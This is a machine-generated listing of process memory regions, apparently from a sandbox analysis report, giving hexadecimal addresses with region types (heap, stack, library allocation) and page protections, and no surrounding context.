trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
31DF000
trusted library section
page readonly
35CE000
trusted library allocation
page read and write
7A0000
heap
page read and write
7EF9D000
unkown
page read and write
24D0000
heap
page read and write
5905000
heap
page read and write
320D000
trusted library allocation
page read and write
B90000
heap
page read and write
5AA000
heap
page read and write
2E90000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
2F6E000
stack
page read and write
1BD6E000
stack
page read and write
36BA000
trusted library allocation
page read and write
2DFB000
heap
page read and write
33C4000
heap
page read and write
36B0000
trusted library allocation
page read and write
361A000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
BB0000
heap
page read and write
1005A000
unkown
page readonly
345B000
heap
page read and write
3BAF000
trusted library allocation
page read and write
36BA000
trusted library allocation
page read and write
250000
trusted library allocation
page read and write
3554000
trusted library allocation
page read and write
26FE000
stack
page read and write
52D0000
trusted library allocation
page read and write
3436000
heap
page read and write
10057000
unkown
page read and write
24E0000
heap
page read and write
35CE000
trusted library allocation
page read and write
8B6E000
trusted library allocation
page read and write
1CC43000
heap
page read and write
2520000
trusted library allocation
page read and write
345D000
heap
page read and write
2BE4000
trusted library allocation
page read and write
1E70000
trusted library allocation
page read and write
3217000
trusted library allocation
page read and write
284C000
stack
page read and write
264E000
stack
page read and write
2B8F000
stack
page read and write
DF0000
heap
page read and write
1F00000
trusted library allocation
page read and write
308E000
stack
page read and write
3F46000
trusted library allocation
page read and write
2FCE000
stack
page read and write
5C3000
trusted library allocation
page read and write
8FEE000
trusted library allocation
page read and write
2760000
trusted library allocation
page read and write
53E000
heap
page read and write
2E60000
trusted library allocation
page read and write
3626000
trusted library allocation
page read and write
3F46000
trusted library allocation
page read and write
3621000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
57D000
heap
page read and write
363000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
210000
heap
page read and write
3459000
heap
page read and write
D70000
heap
page read and write
3442000
heap
page read and write
468A000
stack
page read and write
2C10000
trusted library allocation
page read and write
8DBE000
trusted library allocation
page read and write
2C01000
trusted library allocation
page read and write
889E000
trusted library allocation
page read and write
834E000
trusted library allocation
page read and write
540000
heap
page read and write
3626000
trusted library allocation
page read and write
36BA000
trusted library allocation
page read and write
5B2C000
heap
page read and write
26F4000
trusted library allocation
page read and write
33FD000
heap
page read and write
2BAA000
trusted library allocation
page read and write
3209000
trusted library allocation
page read and write
3431000
heap
page read and write
3F10000
trusted library allocation
page read and write
3206000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
364000
trusted library allocation
page read and write
578B000
trusted library allocation
page read and write
269D000
stack
page read and write
106000
heap
page read and write
3462000
heap
page read and write
463000
trusted library allocation
page read and write
36BC000
trusted library allocation
page read and write
3217000
trusted library allocation
page read and write
31D4000
trusted library section
page readonly
2873000
trusted library allocation
page read and write
2C0E000
trusted library allocation
page read and write
346B000
heap
page read and write
10000
heap
page read and write
3390000
heap
page read and write
2C28000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
4C4000
heap
page read and write
88DE000
trusted library allocation
page read and write
3528000
trusted library allocation
page read and write
42D000
stack
page read and write
2E60000
trusted library allocation
page read and write
10000000
unkown
page readonly
1CB000
heap
page read and write
371C000
trusted library allocation
page read and write
2F1E000
stack
page read and write
33A000
heap
page read and write
3070000
trusted library allocation
page read and write
5ED000
heap
page read and write
3217000
trusted library allocation
page read and write
3F13000
trusted library allocation
page read and write
324000
heap
page read and write
3044000
trusted library allocation
page read and write
3626000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
3F3B000
trusted library allocation
page read and write
2570000
heap
page read and write
3F46000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
573000
heap
page read and write
373000
trusted library allocation
page read and write
3437000
heap
page read and write
2F78000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
5AB2000
heap
page read and write
2C3000
trusted library allocation
page read and write
2FCD000
trusted library allocation
page read and write
39C0000
trusted library allocation
page read and write
20000
heap
page read and write
2C28000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
573000
heap
page read and write
2DC5000
heap
page read and write
33D4000
heap
page read and write
3F16000
trusted library allocation
page read and write
3209000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
2720000
heap
page read and write
31CA000
trusted library allocation
page read and write
3444000
heap
page read and write
370B000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
3219000
trusted library allocation
page read and write
100000
heap
page read and write
7FF00170000
trusted library allocation
page read and write
320E000
trusted library allocation
page read and write
2EC0000
trusted library allocation
page read and write
906E000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
2EBE000
stack
page read and write
2C10000
trusted library allocation
page read and write
2F35000
trusted library allocation
page read and write
160000
heap
page read and write
2C01000
trusted library allocation
page read and write
3200000
trusted library allocation
page read and write
5B0B000
heap
page read and write
5794000
trusted library allocation
page read and write
8F3E000
trusted library allocation
page read and write
10000000
unkown
page readonly
54C000
heap
page read and write
160000
heap
page read and write
3407000
heap
page read and write
834E000
trusted library allocation
page read and write
2BE4000
trusted library allocation
page read and write
10046000
unkown
page readonly
2BE4000
trusted library allocation
page read and write
8C2E000
trusted library allocation
page read and write
578B000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
7FF0026D000
trusted library allocation
page execute and read and write
2C0E000
trusted library allocation
page read and write
9E000
heap
page read and write
3212000
trusted library allocation
page read and write
357D000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
345B000
heap
page read and write
300B000
trusted library allocation
page read and write
8F3E000
trusted library allocation
page read and write
8B4000
heap
page read and write
2C4000
trusted library allocation
page read and write
5A94000
heap
page read and write
2C10000
trusted library allocation
page read and write
2A4F000
stack
page read and write
3626000
trusted library allocation
page read and write
33E6000
heap
page read and write
1CDF000
stack
page read and write
2890000
trusted library allocation
page read and write
2FC7000
trusted library allocation
page read and write
59E000
heap
page read and write
2BE0000
heap
page execute and read and write
3459000
heap
page read and write
2C01000
trusted library allocation
page read and write
396A000
trusted library allocation
page read and write
354E000
trusted library allocation
page read and write
36F5000
trusted library allocation
page read and write
1B4CE000
heap
page read and write
3110000
trusted library allocation
page read and write
3571000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
14D000
heap
page read and write
3090000
trusted library allocation
page read and write
2C01000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
7FF001F0000
trusted library allocation
page execute and read and write
10053000
unkown
page read and write
9A0000
heap
page read and write
371C000
trusted library allocation
page read and write
5B1000
heap
page read and write
346D000
heap
page read and write
2BE4000
trusted library allocation
page read and write
31AE000
trusted library allocation
page read and write
2980000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
3449000
heap
page read and write
370B000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
5AB9000
heap
page read and write
BB8000
heap
page read and write
370E000
trusted library allocation
page read and write
598000
heap
page read and write
4160000
trusted library allocation
page read and write
930000
trusted library allocation
page read and write
362B000
trusted library allocation
page read and write
36F0000
trusted library allocation
page read and write
CBE000
stack
page read and write
370B000
trusted library allocation
page read and write
3446000
heap
page read and write
3F3B000
trusted library allocation
page read and write
5C4000
trusted library allocation
page read and write
3449000
heap
page read and write
578B000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
547000
heap
page read and write
31BE000
stack
page read and write
39E5000
trusted library allocation
page read and write
320D000
trusted library allocation
page read and write
3462000
heap
page read and write
1ED0000
trusted library allocation
page read and write
BC000
stack
page read and write
344E000
heap
page read and write
370B000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
834E000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
911E000
trusted library allocation
page read and write
5B0000
heap
page read and write
2C28000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
15D000
heap
page read and write
1B330000
heap
page read and write
10000000
unkown
page readonly
10000
heap
page read and write
881E000
trusted library allocation
page read and write
12C65000
trusted library allocation
page read and write
320D000
trusted library allocation
page read and write
10000
heap
page read and write
3464000
heap
page read and write
7FF00105000
trusted library allocation
page read and write
68A000
heap
page read and write
10046000
unkown
page readonly
3611000
trusted library allocation
page read and write
362C000
trusted library allocation
page read and write
1CADE000
stack
page read and write
55A8000
heap
page read and write
3442000
heap
page read and write
64E000
heap
page read and write
3585000
trusted library allocation
page read and write
36BA000
trusted library allocation
page read and write
578B000
trusted library allocation
page read and write
1E0000
trusted library allocation
page read and write
356D000
trusted library allocation
page read and write
BE3000
trusted library allocation
page read and write
5AB9000
heap
page read and write
2C0E000
trusted library allocation
page read and write
10000000
unkown
page readonly
69A000
heap
page read and write
BB0000
heap
page read and write
3B69000
trusted library allocation
page read and write
3F3E000
trusted library allocation
page read and write
1C0000
heap
page read and write
21A0000
heap
page read and write
578B000
trusted library allocation
page read and write
3030000
heap
page read and write
850E000
trusted library allocation
page read and write
3626000
trusted library allocation
page read and write
8C9E000
trusted library allocation
page read and write
156000
heap
page read and write
512F000
stack
page read and write
834E000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
578B000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
883E000
trusted library allocation
page read and write
440000
heap
page read and write
35CE000
trusted library allocation
page read and write
150000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
1B50000
heap
page read and write
558D000
heap
page read and write
345B000
heap
page read and write
2F7E000
trusted library allocation
page read and write
3599000
trusted library allocation
page read and write
427000
heap
page read and write
3F1A000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
36BC000
trusted library allocation
page read and write
5572000
heap
page read and write
2C10000
trusted library allocation
page read and write
2C0E000
trusted library allocation
page read and write
410000
heap
page read and write
3F46000
trusted library allocation
page read and write
3F1B000
trusted library allocation
page read and write
308000
heap
page read and write
3F19000
trusted library allocation
page read and write
2C0E000
trusted library allocation
page read and write
297E000
stack
page read and write
A30000
trusted library allocation
page read and write
3A17000
trusted library allocation
page read and write
28B4000
trusted library allocation
page read and write
151000
heap
page read and write
319B000
trusted library allocation
page read and write
3585000
trusted library allocation
page read and write
7FF00240000
trusted library allocation
page execute and read and write
2F84000
trusted library allocation
page read and write
3217000
trusted library allocation
page read and write
23F0000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
3F46000
trusted library allocation
page read and write
5C7000
heap
page read and write
1E70000
trusted library allocation
page read and write
2D40000
trusted library allocation
page read and write
AE3000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
6B7000
heap
page read and write
320D000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
300E000
stack
page read and write
35CE000
trusted library allocation
page read and write
122000
heap
page read and write
BB000
stack
page read and write
2C0E000
trusted library allocation
page read and write
3596000
trusted library allocation
page read and write
1005A000
unkown
page readonly
224000
trusted library allocation
page read and write
3442000
heap
page read and write
2E8C000
trusted library allocation
page read and write
2C0E000
trusted library allocation
page read and write
3207000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
30FE000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
847E000
trusted library allocation
page read and write
2880000
heap
page read and write
320D000
trusted library allocation
page read and write
542000
heap
page read and write
23F0000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
3001000
trusted library allocation
page read and write
356F000
stack
page read and write
2B8E000
stack
page read and write | page guard
2C20000
heap
page execute and read and write
220000
trusted library allocation
page read and write
1B5DE000
stack
page read and write
35CE000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
5B07000
heap
page read and write
2C28000
trusted library allocation
page read and write
8F0000
heap
page read and write
2C01000
trusted library allocation
page read and write
881E000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
913000
trusted library allocation
page read and write
3217000
trusted library allocation
page read and write
290E000
stack
page read and write
151000
heap
page read and write
28E0000
trusted library allocation
page read and write
8E1E000
trusted library allocation
page read and write
2F40000
trusted library allocation
page read and write
3585000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
2C0E000
trusted library allocation
page read and write
6D7000
heap
page read and write
3F46000
trusted library allocation
page read and write
3434000
heap
page read and write
356A000
trusted library allocation
page read and write
10057000
unkown
page read and write
3F3B000
trusted library allocation
page read and write
20000
heap
page read and write
362D000
trusted library allocation
page read and write
10000000
unkown
page readonly
3010000
trusted library allocation
page read and write
578B000
trusted library allocation
page read and write
12A000
heap
page read and write
458000
heap
page read and write
65D000
heap
page read and write
236000
stack
page read and write
7FF00042000
trusted library allocation
page execute and read and write
2EC0000
unkown
page read and write
3627000
trusted library allocation
page read and write
8F6E000
trusted library allocation
page read and write
36F4000
trusted library allocation
page read and write
504000
trusted library allocation
page read and write
1BCBE000
stack
page read and write
340000
trusted library allocation
page read and write
906E000
trusted library allocation
page read and write
2F3E000
trusted library allocation
page read and write
B00000
trusted library allocation
page read and write
200000
trusted library allocation
page read and write
5565000
heap
page read and write
2F40000
trusted library allocation
page read and write
1CC30000
heap
page read and write
27DF000
stack
page read and write
396A000
trusted library allocation
page read and write
3626000
trusted library allocation
page read and write
1005A000
unkown
page readonly
33D4000
heap
page read and write
2C95000
trusted library allocation
page read and write
4C0000
heap
page read and write
33FC000
heap
page read and write
33C6000
heap
page read and write
2BD0000
remote allocation
page read and write
24A000
stack
page read and write
7FF001B0000
trusted library allocation
page execute and read and write
3941000
trusted library allocation
page execute
5794000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
2C0E000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
200000
heap
page read and write
33F8000
heap
page read and write
B03000
trusted library allocation
page read and write
5DB000
heap
page read and write
57A3000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
1CB000
heap
page read and write
5B0000
heap
page read and write
240000
heap
page read and write
3215000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
3F1D000
trusted library allocation
page read and write
2D40000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
5572000
heap
page read and write
35D0000
trusted library allocation
page execute
578B000
trusted library allocation
page read and write
3585000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
366F000
heap
page read and write
7FF000F0000
trusted library allocation
page read and write
2F4B000
trusted library allocation
page read and write
3F3E000
trusted library allocation
page read and write
7FF00190000
trusted library allocation
page execute and read and write
2EA2000
trusted library allocation
page read and write
BF3000
trusted library allocation
page read and write
23F0000
trusted library allocation
page read and write
5DE000
heap
page read and write
3A10000
trusted library allocation
page read and write
1B4AE000
heap
page read and write
55D000
heap
page read and write
31C0000
trusted library allocation
page read and write
36BC000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
10000
heap
page read and write
340B000
heap
page read and write
14F000
heap
page read and write
370B000
trusted library allocation
page read and write
3429000
heap
page read and write
578B000
trusted library allocation
page read and write
4220000
trusted library allocation
page read and write
371C000
trusted library allocation
page read and write
1C0000
heap
page read and write
36BC000
trusted library allocation
page read and write
33C3000
heap
page read and write
33EE000
heap
page read and write
5C7000
heap
page read and write
3121000
trusted library allocation
page read and write
28C0000
trusted library allocation
page read and write
BBE000
stack
page read and write
371C000
trusted library allocation
page read and write
166000
heap
page read and write
168000
heap
page read and write
A53000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
5DF000
heap
page read and write
2C0E000
trusted library allocation
page read and write
113000
heap
page read and write
530000
heap
page read and write
2FFE000
trusted library allocation
page read and write
33B0000
heap
page read and write
2C10000
trusted library allocation
page read and write
2D0000
trusted library allocation
page read and write
5AD8000
heap
page read and write
2D0000
heap
page read and write
3BAF000
trusted library allocation
page read and write
3940000
trusted library allocation
page execute
5E8000
heap
page read and write
3460000
heap
page read and write
2603000
trusted library allocation
page read and write
2940000
trusted library allocation
page read and write
3626000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
4210000
heap
page read and write
36D0000
trusted library allocation
page read and write
C5D000
stack
page read and write
371C000
trusted library allocation
page read and write
BB4000
heap
page read and write
5794000
trusted library allocation
page read and write
19B000
stack
page read and write
2DD0000
trusted library allocation
page read and write
2520000
trusted library allocation
page read and write
2C01000
trusted library allocation
page read and write
33CA000
heap
page read and write
370B000
trusted library allocation
page read and write
834E000
trusted library allocation
page read and write
B0000
heap
page read and write
8D2000
heap
page read and write
1E70000
trusted library allocation
page read and write
620000
heap
page read and write
B24000
trusted library allocation
page read and write
10000
heap
page read and write
3C0000
heap
page read and write
10000
heap
page read and write
464000
trusted library allocation
page read and write
3C0000
heap
page read and write
10046000
unkown
page readonly
30F9000
trusted library allocation
page read and write
310E000
stack
page read and write
3BAF000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
24C000
stack
page read and write
A50000
trusted library allocation
page read and write
8CCE000
trusted library allocation
page read and write
2B61000
trusted library allocation
page read and write
57A000
heap
page read and write
1ED0000
trusted library allocation
page read and write
5D4000
heap
page read and write
644000
heap
page read and write
2BE4000
trusted library allocation
page read and write
3462000
heap
page read and write
258F000
stack
page read and write
578B000
trusted library allocation
page read and write
3626000
trusted library allocation
page read and write
345D000
heap
page read and write
1005A000
unkown
page readonly
36F7000
trusted library allocation
page read and write
55AF000
heap
page read and write
2C000
heap
page read and write
23F0000
trusted library allocation
page read and write
362A000
trusted library allocation
page read and write
3405000
heap
page read and write
61A000
heap
page read and write
203000
trusted library allocation
page read and write
346D000
heap
page read and write
35CE000
trusted library allocation
page read and write
39CB000
trusted library allocation
page read and write
654000
heap
page read and write
1CE10000
heap
page read and write
371C000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
2C10000
trusted library allocation
page read and write
39F0000
heap
page read and write
DC000
stack
page read and write
2DF4000
trusted library allocation
page read and write
8F6E000
trusted library allocation
page read and write
3585000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
558A000
heap
page read and write
3218000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
1F0000
heap
page read and write
35CE000
trusted library allocation
page read and write
321E000
trusted library allocation
page read and write
578B000
trusted library allocation
page read and write
2AE4000
trusted library allocation
page read and write
3435000
heap
page read and write
396A000
trusted library allocation
page read and write
31A1000
trusted library allocation
page read and write
30D000
heap
page read and write
10046000
unkown
page readonly
2C10000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
578B000
trusted library allocation
page read and write
517000
heap
page read and write
B60000
heap
page read and write
55AB000
heap
page read and write
15C000
stack
page read and write
B23000
trusted library allocation
page read and write
3459000
heap
page read and write
155000
heap
page read and write
5AC8000
heap
page read and write
5B22000
heap
page read and write
3F46000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
850000
heap
page read and write
2BE4000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
36F0000
trusted library allocation
page read and write
2EA4000
trusted library allocation
page read and write
5A0000
trusted library allocation
page read and write
5AFB000
heap
page read and write
3BAF000
trusted library allocation
page read and write
3464000
heap
page read and write
2520000
heap
page read and write
3630000
heap
page read and write
31B0000
trusted library allocation
page read and write
4165000
trusted library allocation
page read and write
3444000
heap
page read and write
2C0E000
trusted library allocation
page read and write
3460000
heap
page read and write
3626000
trusted library allocation
page read and write
10053000
unkown
page read and write
3217000
trusted library allocation
page read and write
374000
trusted library allocation
page read and write
55A8000
heap
page read and write
2850000
trusted library allocation
page read and write
2C01000
trusted library allocation
page read and write
4220000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
10000000
unkown
page readonly
346B000
heap
page read and write
883E000
trusted library allocation
page read and write
321D000
trusted library allocation
page read and write
3392000
heap
page read and write
1AA000
stack
page read and write
5794000
trusted library allocation
page read and write
301A000
trusted library allocation
page read and write
55AB000
heap
page read and write
AC0000
trusted library allocation
page read and write
637000
heap
page read and write
3429000
heap
page read and write
3BAF000
trusted library allocation
page read and write
320A000
trusted library allocation
page read and write
3429000
heap
page read and write
2B11000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
BF3000
trusted library allocation
page read and write
510000
heap
page read and write
2EE3000
unkown
page read and write
3610000
trusted library allocation
page read and write
8B0000
heap
page read and write
5B0B000
heap
page read and write
12C61000
trusted library allocation
page read and write
10053000
unkown
page read and write
3622000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
5B1000
heap
page read and write
370B000
trusted library allocation
page read and write
147000
heap
page read and write
3F3B000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
BF4000
trusted library allocation
page read and write
7FF000F2000
trusted library allocation
page execute and read and write
2E5D000
stack
page read and write
8E1E000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
321A000
trusted library allocation
page read and write
2AEA000
trusted library allocation
page read and write
3F3B000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
12D71000
trusted library allocation
page read and write
2980000
trusted library allocation
page read and write
4220000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
30CE000
stack
page read and write
14F000
heap
page read and write
2C28000
trusted library allocation
page read and write
313A000
trusted library allocation
page read and write
3181000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
304E000
stack
page read and write
3010000
trusted library allocation
page read and write
4E2000
heap
page read and write
889E000
trusted library allocation
page read and write
5794000
trusted library allocation
page read and write
31B0000
trusted library allocation
page read and write
3F46000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
7FF00180000
trusted library allocation
page execute and read and write
65A000
heap
page read and write
3209000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
8E9E000
trusted library allocation
page read and write
4E0000
heap
page read and write
33E3000
heap
page read and write
2C01000
trusted library allocation
page read and write
3F46000
trusted library allocation
page read and write
68000
heap
page read and write
2EF3000
trusted library allocation
page read and write
5564000
heap
page read and write
3460000
heap
page read and write
97C000
stack
page read and write
5B7000
heap
page read and write
848E000
trusted library allocation
page read and write
8F3E000
trusted library allocation
page read and write
30B0000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
357A000
trusted library allocation
page read and write
A90000
heap
page read and write
153000
heap
page read and write
90AE000
trusted library allocation
page read and write
1B440000
heap
page read and write
61E000
stack
page read and write
3F46000
trusted library allocation
page read and write
3194000
trusted library allocation
page read and write
7FF00207000
trusted library allocation
page read and write
8CCE000
trusted library allocation
page read and write
2CA0000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
5B1000
heap
page read and write
57A3000
trusted library allocation
page read and write
55AF000
heap
page read and write
8B6E000
trusted library allocation
page read and write
3583000
trusted library allocation
page read and write
2544000
trusted library allocation
page read and write
61A000
heap
page read and write
2B52000
trusted library allocation
page read and write
3444000
heap
page read and write
57A3000
trusted library allocation
page read and write
2C01000
trusted library allocation
page read and write
3217000
trusted library allocation
page read and write
57A3000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
854E000
trusted library allocation
page read and write
3408000
heap
page read and write
3616000
trusted library allocation
page read and write
10053000
unkown
page read and write
3F17000
trusted library allocation
page read and write
396A000
trusted library allocation
page read and write
12DD1000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
3590000
trusted library allocation
page read and write
2C0E000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
3F46000
trusted library allocation
page read and write
90AE000
trusted library allocation
page read and write
3453000
heap
page read and write
33FD000
heap
page read and write
5AD000
heap
page read and write
3429000
heap
page read and write
147000
heap
page read and write
2FDB000
trusted library allocation
page read and write
2CBF000
trusted library allocation
page read and write
205B000
heap
page read and write
2C28000
trusted library allocation
page read and write
55A8000
heap
page read and write
3F12000
trusted library allocation
page read and write
33C7000
heap
page read and write
3449000
heap
page read and write
3629000
trusted library allocation
page read and write
5ABF000
heap
page read and write
2C0E000
trusted library allocation
page read and write
2025000
heap
page read and write
578000
heap
page read and write
A94000
trusted library allocation
page read and write
10053000
unkown
page read and write
2ECB000
trusted library allocation
page read and write
BF0000
heap
page read and write
88DE000
trusted library allocation
page read and write
3217000
trusted library allocation
page read and write
3462000
heap
page read and write
3F3E000
trusted library allocation
page read and write
2FEF000
trusted library allocation
page read and write
3F3B000
trusted library allocation
page read and write
1B86000
heap
page read and write
3464000
heap
page read and write
3168000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
5B22000
heap
page read and write
3B69000
trusted library allocation
page read and write
2FFB000
trusted library allocation
page read and write
7FF00260000
trusted library allocation
page execute and read and write
35CE000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
2BA4000
trusted library allocation
page read and write
2FA9000
trusted library allocation
page read and write
3453000
heap
page read and write
35CE000
trusted library allocation
page read and write
3585000
trusted library allocation
page read and write
2D90000
heap
page read and write
3624000
trusted library allocation
page read and write
154000
heap
page read and write
2C0E000
trusted library allocation
page read and write
3B69000
trusted library allocation
page read and write
3585000
trusted library allocation
page read and write
2BE4000
trusted library allocation
page read and write
366000
heap
page read and write
3460000
heap
page read and write
AE4000
trusted library allocation
page read and write
578B000
trusted library allocation
page read and write
3F46000
trusted library allocation
page read and write
2180000
heap
page read and write
7FF00290000
trusted library allocation
page execute and read and write
57A3000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
2B000
heap
page read and write
10000000
unkown
page readonly
1ED0000
trusted library allocation
page read and write
BA3000
trusted library allocation
page read and write
2C01000
trusted library allocation
page read and write
D0000
heap
page read and write
8AE000
stack
page read and write
3F3E000
trusted library allocation
page read and write
151000
heap
page read and write
7FF00210000
trusted library allocation
page read and write
2F8E000
trusted library allocation
page read and write
1ACC0000
trusted library allocation
page read and write
2B7A000
trusted library allocation
page read and write
14E000
heap
page read and write
5ACF000
heap
page read and write
55A8000
heap
page read and write
346D000
heap
page read and write
658000
heap
page read and write
578000
heap
page read and write
847E000
trusted library allocation
page read and write
3557000
trusted library allocation
page read and write
A7F000
trusted library allocation
page read and write
3217000
trusted library allocation
page read and write
1005A000
unkown
page readonly
3453000
heap
page read and write
15C000
heap
page read and write
26C000
stack
page read and write
345D000
heap
page read and write
3429000
heap
page read and write
23F0000
trusted library allocation
page read and write
3DAB000
stack
page read and write
36BC000
trusted library allocation
page read and write
2EAC000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
2530000
trusted library allocation
page read and write
5569000
heap
page read and write
1EE0000
trusted library allocation
page read and write
1D0000
heap
page read and write
5AB2000
heap
page read and write
2AE0000
trusted library allocation
page read and write
834E000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
55A4000
heap
page read and write
55A8000
heap
page read and write
320D000
trusted library allocation
page read and write
5A9C000
heap
page read and write
1C880000
heap
page read and write
2520000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
3043000
trusted library allocation
page read and write
3110000
trusted library allocation
page read and write
2BE4000
trusted library allocation
page read and write
3203000
trusted library allocation
page read and write
12F12000
trusted library allocation
page read and write
51E000
heap
page read and write
14C000
heap
page read and write
10057000
unkown
page read and write
5AD000
stack
page read and write
3F3E000
trusted library allocation
page read and write
25B0000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
5B22000
heap
page read and write
346B000
heap
page read and write
2E83000
unkown
page read and write
12EB0000
trusted library allocation
page read and write
5E8000
heap
page read and write
2D7000
heap
page read and write
4E0000
trusted library allocation
page read and write
8FEE000
trusted library allocation
page read and write
850E000
trusted library allocation
page read and write
31D0000
trusted library section
page readonly
5AA3000
heap
page read and write
4B7000
heap
page read and write
30D4000
trusted library allocation
page read and write
28A2000
heap
page read and write
28DE000
stack
page read and write
8D2E000
trusted library allocation
page read and write
3F14000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
36BC000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
7FF00230000
trusted library allocation
page read and write
27C000
stack
page read and write
2BE4000
trusted library allocation
page read and write
33D4000
heap
page read and write
346D000
heap
page read and write
3F46000
trusted library allocation
page read and write
53B000
heap
page read and write
108000
heap
page read and write
578B000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
A60000
heap
page read and write
2C28000
trusted library allocation
page read and write
1ED0000
trusted library allocation
page read and write
548000
heap
page read and write
3340000
trusted library allocation
page read and write
33C6000
heap
page read and write
7FF0004C000
trusted library allocation
page execute and read and write
396A000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
1F8000
heap
page read and write
2A0000
trusted library allocation
page read and write
35CE000
trusted library allocation
page read and write
9C0000
heap
page read and write
7FF001D0000
trusted library allocation
page execute and read and write
578B000
trusted library allocation
page read and write
350000
trusted library allocation
page read and write
7EF9A000
unkown
page read and write
1ED0000
trusted library allocation
page read and write
56A000
heap
page read and write
348B000
trusted library allocation
page read and write
2D70000
trusted library allocation
page read and write
10000
heap
page read and write
914000
trusted library allocation
page read and write
396A000
trusted library allocation
page read and write
66D000
heap
page read and write
3F3E000
trusted library allocation
page read and write
3623000
trusted library allocation
page read and write
3223000
trusted library allocation
page read and write
8C2E000
trusted library allocation
page read and write
3944000
trusted library allocation
page execute
2F83000
trusted library allocation
page read and write
2EB2000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
3F1E000
trusted library allocation
page read and write
311D000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
5DB000
heap
page read and write
3B69000
trusted library allocation
page read and write
24000
heap
page read and write
3F46000
trusted library allocation
page read and write
7FF002B0000
trusted library allocation
page execute and read and write
3435000
heap
page read and write
3BAF000
trusted library allocation
page read and write
2320000
heap
